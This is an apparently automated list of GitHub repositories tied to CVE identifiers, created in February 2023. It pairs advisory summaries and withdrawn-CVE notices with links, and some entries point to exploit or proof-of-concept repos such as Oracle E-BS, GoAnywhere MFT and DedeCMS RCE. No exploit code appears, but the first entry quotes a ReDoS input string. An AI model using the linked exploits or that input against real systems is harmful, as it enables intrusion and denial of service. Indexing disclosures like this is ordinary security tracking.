**A vulnerability, which was classified as problematic, was found in simple-markdown 0.6.0. Affected is an unknown function of the file simple-markdown.js. The manipulation with the input <<<<<<<<<<:/:/:/:/:/:/:/:/:/:/ leads to inefficient regular expression complexity. It is possible to launch the attack remotely. The e CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-25102](https://github.com/Live-Hack-CVE/CVE-2019-25102) create time: 2023-02-12T15:25:52Z

**The Microsoft MSHTML attack is a remote code execution vulnerability which was discovered in 2021 and affects multiple Windows versions. This is designated as CVE-2021- 40444, and it is currently distributed by malicious Office 365 documents.** : [ireshchaminda1/Microsoft-MSHTML-Remote-code-Execution-Vulnerability-May-2022-](https://github.com/ireshchaminda1/Microsoft-MSHTML-Remote-code-Execution-Vulnerability-May-2022-) create time: 2023-02-12T15:40:45Z

**AndroRAT is a capability that can be used to inject a root exploit as a silent installation to perform a malicious task on the device. This AndroRAT is designed to exploit CVE-2015-1805, a vulnerability that was discovered and made public in 2016.** : [ireshchaminda1/Android-Privilege-Escalation-Remote-Access-Vulnerability-CVE-2015-1805-May-2022-](https://github.com/ireshchaminda1/Android-Privilege-Escalation-Remote-Access-Vulnerability-CVE-2015-1805-May-2022-) create time: 2023-02-12T15:59:12Z

**Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.11. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0794](https://github.com/Live-Hack-CVE/CVE-2023-0794) create time: 2023-02-12T15:26:23Z

**Weak Password Requirements in GitHub repository thorsten/phpmyfaq prior to 3.1.11. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0793](https://github.com/Live-Hack-CVE/CVE-2023-0793) create time: 2023-02-12T15:26:19Z

**Code Injection in GitHub repository thorsten/phpmyfaq prior to 3.1.11. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0792](https://github.com/Live-Hack-CVE/CVE-2023-0792) create time: 2023-02-12T15:26:16Z

**Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.11. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0791](https://github.com/Live-Hack-CVE/CVE-2023-0791) create time: 2023-02-12T15:26:12Z

**Uncaught Exception in GitHub repository thorsten/phpmyfaq prior to 3.1.11. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0790](https://github.com/Live-Hack-CVE/CVE-2023-0790) create time: 2023-02-12T15:26:09Z

**Command Injection in GitHub repository thorsten/phpmyfaq prior to 3.1.11. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0789](https://github.com/Live-Hack-CVE/CVE-2023-0789) create time: 2023-02-12T15:26:06Z

**Code Injection in GitHub repository thorsten/phpmyfaq prior to 3.1.11. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0788](https://github.com/Live-Hack-CVE/CVE-2023-0788) create time: 2023-02-12T15:26:02Z

**Cross-site Scripting (XSS) - Generic in GitHub repository thorsten/phpmyfaq prior to 3.1.11. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0787](https://github.com/Live-Hack-CVE/CVE-2023-0787) create time: 2023-02-12T15:25:59Z

**Cross-site Scripting (XSS) - Generic in GitHub repository thorsten/phpmyfaq prior to 3.1.11. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0786](https://github.com/Live-Hack-CVE/CVE-2023-0786) create time: 2023-02-12T15:25:56Z

**Oracle E-BS CVE-2022-21587 Exploit** : [Zh1z3ven/Oracle-E-BS-CVE-2022-21587-Exploit](https://github.com/Zh1z3ven/Oracle-E-BS-CVE-2022-21587-Exploit) create time: 2023-02-12T14:37:56Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2011-4858. Reason: This candidate is a duplicate of CVE-2011-4858. Notes: All CVE users should reference CVE-2011-4858 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2011-4084](https://github.com/Live-Hack-CVE/CVE-2011-4084) create time: 2023-02-12T12:10:38Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2012-6060. Reason: This candidate is a reservation duplicate of CVE-2012-6060. Notes: All CVE users should reference CVE-2012-6060 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-5598](https://github.com/Live-Hack-CVE/CVE-2012-5598) create time: 2023-02-12T12:11:06Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2012-6053. Reason: This candidate is a reservation duplicate of CVE-2012-6053. Notes: All CVE users should reference CVE-2012-6053 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-5593](https://github.com/Live-Hack-CVE/CVE-2012-5593) create time: 2023-02-12T12:11:02Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2012-6062. Reason: This candidate is a reservation duplicate of CVE-2012-6062. Notes: All CVE users should reference CVE-2012-6062 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-5600](https://github.com/Live-Hack-CVE/CVE-2012-5600) create time: 2023-02-12T12:10:59Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2012-6496, CVE-2012-6497. Reason: this candidate was intended for one issue, but the candidate was publicly used to label concerns about multiple products. Notes: All CVE users should consult CVE-2012-6496 and CVE-2012-6497 to determine which ID is appropri CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-5664](https://github.com/Live-Hack-CVE/CVE-2012-5664) create time: 2023-02-12T12:10:55Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2012-5881, CVE-2012-5882, CVE-2012-5883. Reason: This candidate is a duplicate of CVE-2012-5881, CVE-2012-5882, and CVE-2012-5883. Notes: All CVE users should reference one or more of CVE-2012-5881, CVE-2012-5882, and CVE-2012-5883 instead of this candidate CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-5475](https://github.com/Live-Hack-CVE/CVE-2012-5475) create time: 2023-02-12T12:10:49Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2012-6061. Reason: This candidate is a reservation duplicate of CVE-2012-6061. Notes: All CVE users should reference CVE-2012-6061 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-5599](https://github.com/Live-Hack-CVE/CVE-2012-5599) create time: 2023-02-12T12:10:42Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2012-6059. Reason: This candidate is a reservation duplicate of CVE-2012-6059. Notes: All CVE users should reference CVE-2012-6059 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-5597](https://github.com/Live-Hack-CVE/CVE-2012-5597) create time: 2023-02-12T12:10:35Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2012-6054. Reason: This candidate is a reservation duplicate of CVE-2012-6054. Notes: All CVE users should reference CVE-2012-6054 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-5594](https://github.com/Live-Hack-CVE/CVE-2012-5594) create time: 2023-02-12T12:10:32Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2012-6052. Reason: This candidate is a reservation duplicate of CVE-2012-6052. Notes: All CVE users should reference CVE-2012-6052 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-5592](https://github.com/Live-Hack-CVE/CVE-2012-5592) create time: 2023-02-12T12:10:28Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2012-6056. Reason: This candidate is a reservation duplicate of CVE-2012-6056. Notes: All CVE users should reference CVE-2012-6056 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-5595](https://github.com/Live-Hack-CVE/CVE-2012-5595) create time: 2023-02-12T12:10:25Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2012-6057. Reason: This candidate is a reservation duplicate of CVE-2012-6057. Notes: All CVE users should reference CVE-2012-6057 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-5596](https://github.com/Live-Hack-CVE/CVE-2012-5596) create time: 2023-02-12T12:10:21Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2012-6055. Reason: This candidate is a reservation duplicate of CVE-2012-6055. Notes: All CVE users should reference CVE-2012-6055 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-5601](https://github.com/Live-Hack-CVE/CVE-2012-5601) create time: 2023-02-12T12:10:14Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-6500](https://github.com/Live-Hack-CVE/CVE-2013-6500) create time: 2023-02-12T12:10:18Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2013-0328. Reason: This candidate is a reservation duplicate of CVE-2013-0328. Notes: All CVE users should reference CVE-2013-0328 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-6488](https://github.com/Live-Hack-CVE/CVE-2013-6488) create time: 2023-02-12T12:10:11Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2013-6858. Reason: This candidate is a reservation duplicate of CVE-2013-6858. Notes: All CVE users should reference CVE-2013-6858 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-6406](https://github.com/Live-Hack-CVE/CVE-2013-6406) create time: 2023-02-12T12:10:08Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2015-5257. Reason: This candidate is a reservation duplicate of CVE-2015-5257. Notes: All CVE users should reference CVE-2015-5257 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-5275](https://github.com/Live-Hack-CVE/CVE-2015-5275) create time: 2023-02-12T12:10:52Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2015-0284. Reason: This candidate is a reservation duplicate of CVE-2015-0284. Notes: All CVE users should reference CVE-2015-0284 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-2144](https://github.com/Live-Hack-CVE/CVE-2016-2144) create time: 2023-02-12T12:10:45Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2015-1197. Reason: This candidate is a duplicate of CVE-2015-1197. Notes: All CVE users should reference CVE-2015-1197 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-7516](https://github.com/Live-Hack-CVE/CVE-2017-7516) create time: 2023-02-12T12:10:04Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2017-7503. Reason: This candidate is a reservation duplicate of CVE-2017-7503. Notes: All CVE users should reference CVE-2017-7503 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-7492](https://github.com/Live-Hack-CVE/CVE-2017-7492) create time: 2023-02-12T12:10:01Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA based off of CNT 3. Further investigation determined that there was a secure method for using the directive. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-7473](https://github.com/Live-Hack-CVE/CVE-2017-7473) create time: 2023-02-12T12:09:57Z

**A vulnerability classified as problematic was found in SourceCodester Best Online News Portal 1.0. Affected by this vulnerability is an unknown functionality of the file check_availability.php. The manipulation of the argument username leads to exposure of sensitive information through data queries. The attack can be l CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0785](https://github.com/Live-Hack-CVE/CVE-2023-0785) create time: 2023-02-12T12:09:52Z

**A vulnerability classified as critical has been found in SourceCodester Best Online News Portal 1.0. Affected is an unknown function of the component Login Page. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0784](https://github.com/Live-Hack-CVE/CVE-2023-0784) create time: 2023-02-12T12:09:49Z

**CVE-2016-10993** : [varelsecurity/CVE-2016-10993](https://github.com/varelsecurity/CVE-2016-10993) create time: 2023-02-12T06:28:43Z

**no description** : [wlswotmd/CVE-2022-0435](https://github.com/wlswotmd/CVE-2022-0435) create time: 2023-02-12T07:13:19Z

**no description** : [wlswotmd/CVE-2022-1015](https://github.com/wlswotmd/CVE-2022-1015) create time: 2023-02-12T07:06:40Z

**Denial of service in modem due to null pointer dereference while processing DNS packets CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25733](https://github.com/Live-Hack-CVE/CVE-2022-25733) create time: 2023-02-12T06:44:48Z

**IBM Watson Knowledge Catalog on Cloud Pak for Data 4.5.0 is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 237402. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41731](https://github.com/Live-Hack-CVE/CVE-2022-41731) create time: 2023-02-12T06:44:44Z

**Memory corruption in modem due to improper length check while copying into memory CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25729](https://github.com/Live-Hack-CVE/CVE-2022-25729) create time: 2023-02-12T06:44:40Z

**In wlan driver, there is a possible missing params check. This could lead to local denial of service in wlan services. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38681](https://github.com/Live-Hack-CVE/CVE-2022-38681) create time: 2023-02-12T06:44:37Z

**In wlan driver, there is a possible missing params check. This could lead to local denial of service in wlan services. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38674](https://github.com/Live-Hack-CVE/CVE-2022-38674) create time: 2023-02-12T06:44:33Z

**HP Factory Preinstalled Images on certain systems that shipped with Windows 10 versions 20H2 and earlier OS versions might allow escalation of privilege via execution of certain files outside the restricted path. This potential vulnerability was remediated starting with Windows 10 versions 21H2 on October 31, 2021. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38396](https://github.com/Live-Hack-CVE/CVE-2022-38396) create time: 2023-02-12T06:44:29Z

**Transient DOS due to improper input validation in WLAN Host while parsing frame during defragmentation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34146](https://github.com/Live-Hack-CVE/CVE-2022-34146) create time: 2023-02-12T06:44:26Z

**Memory corruption in modem due to buffer copy without checking size of input while receiving WMI command. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33277](https://github.com/Live-Hack-CVE/CVE-2022-33277) create time: 2023-02-12T06:44:23Z

**Memory corruption due to use after free in trusted application environment. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33225](https://github.com/Live-Hack-CVE/CVE-2022-33225) create time: 2023-02-12T06:44:19Z

**Transient Denial-of-service in Automotive due to improper input validation while parsing ELF file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33216](https://github.com/Live-Hack-CVE/CVE-2022-33216) create time: 2023-02-12T06:44:16Z

**Information disclosure in modem due to buffer over-read while processing response from DNS server CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25728](https://github.com/Live-Hack-CVE/CVE-2022-25728) create time: 2023-02-12T06:44:12Z

**keycloak 18.0.0: open redirect in auth endpoint via the redirect_uri parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1970](https://github.com/Live-Hack-CVE/CVE-2022-1970) create time: 2023-02-12T06:43:54Z

**CVE-2022-29455** : [varelsecurity/CVE-2022-29455](https://github.com/varelsecurity/CVE-2022-29455) create time: 2023-02-12T06:26:11Z

**In Progress WS_FTP Server before 8.8, it is possible for a host administrator to elevate their privileges via the administrative interface due to insufficient authorization controls applied on user modification workflows. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24029](https://github.com/Live-Hack-CVE/CVE-2023-24029) create time: 2023-02-12T06:44:02Z

**Auth. Stored Cross-Site Scripting (XSS) vulnerability in WordPress Absolutely Glamorous Custom Admin plugin <= 6.8 versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36823](https://github.com/Live-Hack-CVE/CVE-2021-36823) create time: 2023-02-12T01:16:29Z

**Authenticated (admin+) Stored Cross-Site Scripting (XSS) vulnerability discovered in AMP for WP – Accelerated Mobile Pages plugin <= 1.0.77.31 versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23150](https://github.com/Live-Hack-CVE/CVE-2021-23150) create time: 2023-02-12T01:16:26Z

**Authenticated (subscriber or higher user role if allowed to access projects) Stored Cross-Site Scripting (XSS) vulnerability in weDevs WP Project Manager plugin <= 2.4.13 versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36826](https://github.com/Live-Hack-CVE/CVE-2021-36826) create time: 2023-02-12T01:16:22Z

**iOS customization app powered by CVE-2022-46689. No jailbreak required.** : [BomberFish/Mandela-Rewritten](https://github.com/BomberFish/Mandela-Rewritten) create time: 2023-02-12T01:33:45Z

**In widevine, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07446236; Issue ID: ALPS07446236. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32595](https://github.com/Live-Hack-CVE/CVE-2022-32595) create time: 2023-02-12T00:07:22Z

**Bash Script for Checking Command Injection Vulnerability on CentOS Web Panel [CWP] (CVE-2022-44877)** : [Chocapikk/CVE-2022-44877](https://github.com/Chocapikk/CVE-2022-44877) create time: 2023-02-11T20:45:08Z

**Jenkins NeuVector Vulnerability Scanner Plugin 1.5 and earlier stored credentials unencrypted in its global configuration file on the Jenkins master where they could be viewed by users with access to the master file system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-10430](https://github.com/Live-Hack-CVE/CVE-2019-10430) create time: 2023-02-11T19:45:23Z

**A vulnerability was found in EcShop 4.1.5. It has been classified as critical. This affects an unknown part of the file /ecshop/admin/template.php of the component PHP File Handler. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the publi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0783](https://github.com/Live-Hack-CVE/CVE-2023-0783) create time: 2023-02-11T19:45:34Z

**A vulnerability was found in Tenda AC23 16.03.07.45 and classified as critical. Affected by this issue is the function formSetSysToolDDNS/formGetSysToolDDNS of the file /bin/httpd. The manipulation leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public an CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0782](https://github.com/Live-Hack-CVE/CVE-2023-0782) create time: 2023-02-11T19:45:31Z

**A command injection vulnerability in the firmware_update command, in the device's restricted telnet interface, allows an authenticated attacker to execute arbitrary commands as root. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0127](https://github.com/Live-Hack-CVE/CVE-2023-0127) create time: 2023-02-11T19:45:27Z

**Use-after-free vulnerability in the CWindow object implementation in Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability." CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-6042](https://github.com/Live-Hack-CVE/CVE-2015-6042) create time: 2023-02-11T17:35:12Z

**[PoC] Privilege escalation & code execution via LFI in PwnDoC** : [yuriisanin/CVE-2022-45771](https://github.com/yuriisanin/CVE-2022-45771) create time: 2023-02-11T15:26:14Z

**Heap-based Buffer Overflow in GitHub repository strukturag/libde265 prior to and including 1.0.8. The fix is established in commit 8e89fe0e175d2870c39486fdd09250b230ec10b8 but does not yet belong to an official release. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1253](https://github.com/Live-Hack-CVE/CVE-2022-1253) create time: 2023-02-11T15:25:24Z

**A vulnerability was found in SourceCodester Canteen Management System 1.0. It has been declared as critical. This vulnerability affects the function query of the file removeOrder.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0781](https://github.com/Live-Hack-CVE/CVE-2023-0781) create time: 2023-02-11T15:25:04Z

**Multiple Cisco products are affected by a vulnerability in the Snort detection engine that could allow an unauthenticated, remote attacker to bypass a configured File Policy for HTTP. The vulnerability is due to incorrect detection of modified HTTP packets used in chunked responses. An attacker could exploit this vulne CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-3299](https://github.com/Live-Hack-CVE/CVE-2020-3299) create time: 2023-02-11T13:12:31Z

**Multiple Cisco products are affected by a vulnerability in the Snort application detection engine that could allow an unauthenticated, remote attacker to bypass the configured policies on an affected system. The vulnerability is due to a flaw in the detection algorithm. An attacker could exploit this vulnerability by s CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-1236](https://github.com/Live-Hack-CVE/CVE-2021-1236) create time: 2023-02-11T13:12:27Z

**Multiple Cisco products are affected by a vulnerability with TCP Fast Open (TFO) when used in conjunction with the Snort detection engine that could allow an unauthenticated, remote attacker to bypass a configured file policy for HTTP. The vulnerability is due to incorrect detection of the HTTP payload if it is contain CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-1224](https://github.com/Live-Hack-CVE/CVE-2021-1224) create time: 2023-02-11T13:12:24Z

**Multiple Cisco products are affected by a vulnerability in the Snort detection engine that could allow an unauthenticated, remote attacker to bypass a configured file policy for HTTP. The vulnerability is due to incorrect handling of an HTTP range header. An attacker could exploit this vulnerability by sending crafted CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-1223](https://github.com/Live-Hack-CVE/CVE-2021-1223) create time: 2023-02-11T13:12:20Z

**A vulnerability in Server Name Identification (SNI) request filtering of Cisco Web Security Appliance (WSA), Cisco Firepower Threat Defense (FTD), and the Snort detection engine could allow an unauthenticated, remote attacker to bypass filtering technology on an affected device and exfiltrate data from a compromised ho CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34749](https://github.com/Live-Hack-CVE/CVE-2021-34749) create time: 2023-02-11T13:12:15Z

**Multiple Cisco products are affected by a vulnerability in the way the Snort detection engine processes ICMP traffic that could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to improper memory resource management while the Snort de CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40114](https://github.com/Live-Hack-CVE/CVE-2021-40114) create time: 2023-02-11T13:12:12Z

**Dell PowerScale OneFS, versions 8.2.x through 9.3.x contain a weak encoding for a password. A malicious local privileged attacker may potentially exploit this vulnerability, leading to information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34445](https://github.com/Live-Hack-CVE/CVE-2022-34445) create time: 2023-02-11T13:13:06Z

**Dell PowerScale OneFS, versions 9.2.0.x through 9.4.0.x contain an information vulnerability. A remote unauthenticated attacker may potentially exploit this vulnerability to cause data leak. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34444](https://github.com/Live-Hack-CVE/CVE-2022-34444) create time: 2023-02-11T13:13:02Z

**Dell System Update, version 2.0.0 and earlier, contains an Improper Certificate Validation in data parser module. A local attacker with high privileges could potentially exploit this vulnerability, leading to credential theft and/or denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34404](https://github.com/Live-Hack-CVE/CVE-2022-34404) create time: 2023-02-11T13:12:59Z

**SupportAssist for Home PCs (versions 3.11.4 and prior) contain an insufficient session expiration Vulnerability. An authenticated non-admin user can be able to obtain the refresh token and that leads to reuse the access token and fetch sensitive information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34392](https://github.com/Live-Hack-CVE/CVE-2022-34392) create time: 2023-02-11T13:12:56Z

**Dell SupportAssist contains a rate limit bypass issues in screenmeet API third party component. An unauthenticated attacker could potentially exploit this vulnerability and impersonate a legitimate dell customer to a dell support technician. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34389](https://github.com/Live-Hack-CVE/CVE-2022-34389) create time: 2023-02-11T13:12:52Z

**Dell SupportAssist for Home PCs (version 3.11.4 and prior) and SupportAssist for Business PCs (version 3.2.0 and prior) contain information disclosure vulnerability. A local malicious user with low privileges could exploit this vulnerability to view and modify sensitive information in the database of the affected appli CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34388](https://github.com/Live-Hack-CVE/CVE-2022-34388) create time: 2023-02-11T13:12:49Z

**Dell SupportAssist for Home PCs (version 3.11.4 and prior) and SupportAssist for Business PCs (version 3.2.0 and prior) contain a privilege escalation vulnerability. A local authenticated malicious user could potentially exploit this vulnerability to elevate privileges and gain total control of the system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34387](https://github.com/Live-Hack-CVE/CVE-2022-34387) create time: 2023-02-11T13:12:45Z

**Dell SupportAssist for Home PCs (version 3.11.4 and prior) and SupportAssist for Business PCs (version 3.2.0 and prior) contain cryptographic weakness vulnerability. An authenticated non-admin user could potentially exploit the issue and obtain sensitive information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34386](https://github.com/Live-Hack-CVE/CVE-2022-34386) create time: 2023-02-11T13:12:42Z

**SupportAssist for Home PCs (version 3.11.4 and prior) and SupportAssist for Business PCs (version 3.2.0 and prior) contain cryptographic weakness vulnerability. An authenticated non-admin user could potentially exploit the issue and obtain sensitive information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34385](https://github.com/Live-Hack-CVE/CVE-2022-34385) create time: 2023-02-11T13:12:38Z

**Dell SupportAssist Client Consumer (version 3.11.1 and prior), SupportAssist Client Commercial (version 3.2 and prior), Dell Command | Update, Dell Update, and Alienware Update versions before 4.5 contain a Local Privilege Escalation Vulnerability in the Advanced Driver Restore component. A local malicious user may pot CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34384](https://github.com/Live-Hack-CVE/CVE-2022-34384) create time: 2023-02-11T13:12:35Z

**The PDF Generator for WordPress plugin before 1.1.2 includes a vendored dompdf example file which is susceptible to Reflected Cross-Site Scripting and could be used against high privilege users such as admin CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4321](https://github.com/Live-Hack-CVE/CVE-2022-4321) create time: 2023-02-11T13:12:03Z

**Improper Restriction of Rendered UI Layers or Frames in GitHub repository cockpit-hq/cockpit prior to 2.3.9-dev. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0780](https://github.com/Live-Hack-CVE/CVE-2023-0780) create time: 2023-02-11T13:12:09Z

**PoC Exploit for RCE vulnerability in DedeCMS v6.1.9** : [Athishpranav2003/CVE-2022-44118-Exploit](https://github.com/Athishpranav2003/CVE-2022-44118-Exploit) create time: 2023-02-11T07:29:08Z

**CVE-2023-0669 GoAnywhere MFT suffers from a pre-authentication command injection vulnerability in the License Response Servlet due to deserializing an arbitrary attacker-controlled object.** : [0xf4n9x/CVE-2023-0669](https://github.com/0xf4n9x/CVE-2023-0669) create time: 2023-02-10T13:02:55Z

**openjpeg: A heap-based buffer overflow flaw was found in the patch for CVE-2013-6045. A crafted j2k image could cause the application to crash, or potentially execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-9675](https://github.com/Live-Hack-CVE/CVE-2016-9675) create time: 2023-02-10T19:49:27Z

**In BIG-IP 13.0.0, 12.1.0-12.1.3.7, 11.6.1-11.6.3.2, or 11.5.1-11.5.8, the Application Acceleration Manager (AAM) wamd process used in processing of images and PDFs fails to drop group permissions when executing helper scripts. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6601](https://github.com/Live-Hack-CVE/CVE-2019-6601) create time: 2023-02-10T19:49:23Z

**On BIG-IP 14.0.0-14.1.0.1, 13.0.0-13.1.1.4, and 12.1.0-12.1.4, internal methods used to prevent arbitrary file overwrites in Appliance Mode were not fully effective. An authenticated attacker with a high privilege level may be able to bypass protections implemented in appliance mode to overwrite arbitrary system files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6614](https://github.com/Live-Hack-CVE/CVE-2019-6614) create time: 2023-02-10T19:49:20Z

